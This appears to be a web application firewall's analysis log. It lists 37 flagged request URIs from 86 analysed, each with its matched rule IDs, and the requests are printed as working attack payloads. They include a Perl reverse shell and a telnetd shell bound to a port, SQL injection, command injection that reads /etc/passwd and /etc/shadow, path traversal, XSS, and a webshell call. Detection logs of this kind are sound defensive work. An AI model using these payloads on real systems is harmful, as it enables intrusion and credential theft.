---------------------- Statistics of URIs analyzed------------------------
[86] input, [49] clean, [37] attacks
--------------------------- Analysis results -----------------------------
Packet [3]	/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST[ccc]`;&ccc=ls-alh	Nattacks [2]	[933130]	[949110]
Packet [7]	/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=member%20field=1%0aunion%0aselect%0auser()%23	Nattacks [3]	[932115]	[942190]	[949110]
Packet [8]	/phpmailer/contact_form.php?action=send&msg=<?php	Nattacks [2]	[933100]	[949110]
Packet [9]	/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3bforeach%20my%20%24key%28keys%20%25ENV%29%7bif%28%24ENV%7b%24key%7d%3d~/%28.%2a%29/%29%7b%24ENV%7b%24key%7d%3d%241%3b%7d%7d%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22192.168.0.3%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24~-%3efdopen%28%24c%2cw%29%3bwhile%28%3c%3e%29%7bif%28%24_%3d~%20/%28.%2a%29/%29%7bsystem%20%241%3b%7d%7d%3b%27%3becho%20%27`	Nattacks [7]	[920220]	[932100]	[932105]	[932110]	[932115]	[933180]	[949110]
Packet [10]	/set_mail.cgi?next_url=mail.htm&loginuse=admin&loginpas=%s&sender=a@a.com&receiver1=;telnetd$IFS-p4444$IFS-l/bin/sh&\receiver2=&receiver3=&receiver4=&ssl=0&svr=smtp.google.com&smtpport=25&user=&pwd=	Nattacks [3]	[920220]	[932160]	[949110]
Packet [15]	/fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960	Nattacks [2]	[942160]	[949110]
Packet [16]	/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)	Nattacks [2]	[942160]	[949110]
Packet [18]	/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST[ccc]`;&ccc=ls-alh/home/filex1/custom_template/1000/	Nattacks [2]	[933130]	[949110]
Packet [20]	/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a	Nattacks [3]	[942160]	[942190]	[949110]
Packet [23]	/massmail.php?class=666&or=<(select*from(select	Nattacks [2]	[942360]	[949110]
Packet [24]	/simpleupload.py?$'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"\'%0abash	Nattacks [2]	[932100]	[949110]
Packet [26]	/zikula4/jcss.php?f=..\..\..\..\..\userdata\finAJcT.txt	Nattacks [3]	[930100]	[930110]	[949110]
Packet [28]	/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=1.1.1.2%26+echo%20	Nattacks [2]	[932110]	[949110]
Packet [29]	/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(cat%20/etc/passwd)>%262`	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
Packet [31]	/source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f\'%2b(select*from(select(sleep(2)))a)%2b\'	Nattacks [2]	[942160]	[949110]
Packet [32]	/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../etc/passwd%00&Action=blast&hidenav=1	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [35]	/courier/web/1000@/wmProgressval.html?server=file:///etc/passwd#https://localhost	Nattacks [3]	[930120]	[932160]	[949110]
Packet [36]	/modtask.php?action=confirmuser&userid=(select*from(select	Nattacks [2]	[942360]	[949110]
Packet [38]	/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E	Nattacks [5]	[941100]	[941120]	[941160]	[941180]	[949110]
Packet [39]	/seos/1000/find.api?method=x%27%60id>/tmp/zz%60%27&oauth_token=b	Nattacks [2]	[932100]	[949110]
Packet [41]	/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp?action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR	Nattacks [2]	[932115]	[949110]
Packet [42]	/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE	Nattacks [2]	[941110]	[949110]
Packet [49]	/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=form%20form=1%20field=1%0aunion%0aselect%0auser()%23	Nattacks [3]	[932115]	[942190]	[949110]
Packet [50]	/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E	Nattacks [4]	[941100]	[941120]	[941160]	[949110]
Packet [51]	/cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23	Nattacks [2]	[932110]	[949110]
Packet [52]	/ping.cgi?DIA_IPADDRESS=1.1.1.2;cat%20/etc/passwd	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
Packet [53]	/subrion/actions.json?action=delete-file&item=members&itemid=1&field=emailor%20sleep(3)%20,username&file=123	Nattacks [2]	[942160]	[949110]
Packet [57]	/doli/societe/list.php?sall=asd%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [63]	/courier/B3dKe9sQaa0L.log	Nattacks [2]	[920440]	[949110]
Packet [66]	/web/google_analytics.php?cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23	Nattacks [3]	[932100]	[932110]	[949110]
Packet [68]	/phpmailer/contact_form.php?action=send&msg=<?php	Nattacks [2]	[933100]	[949110]
Packet [70]	/api/saveconfig?key=__import__(%27os%27).system(%27touch%20%2Ftmp%2Fpy100%20%26%27)&value=10&_=1496061368064	Nattacks [2]	[933160]	[949110]
Packet [71]	/actionphp/download.File.php?&file=../../../../../../etc/passwd	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [78]	/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=1.1.1.2%3B+echo%20	Nattacks [2]	[932110]	[949110]
Packet [83]	/Embedded_Ace_Set_Task.cgi?$'5025=data;cat${IFS}/etc/shadow${IFS}>>/mnt/hda1/junxion/log/messages'	Nattacks [4]	[930120]	[932130]	[932160]	[949110]
Packet [84]	/phpmailer/contact_form.php?action=send&msg=<?php	Nattacks [2]	[933100]	[949110]
Packet [85]	/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.txt	Nattacks [3]	[930100]	[930110]	[949110]
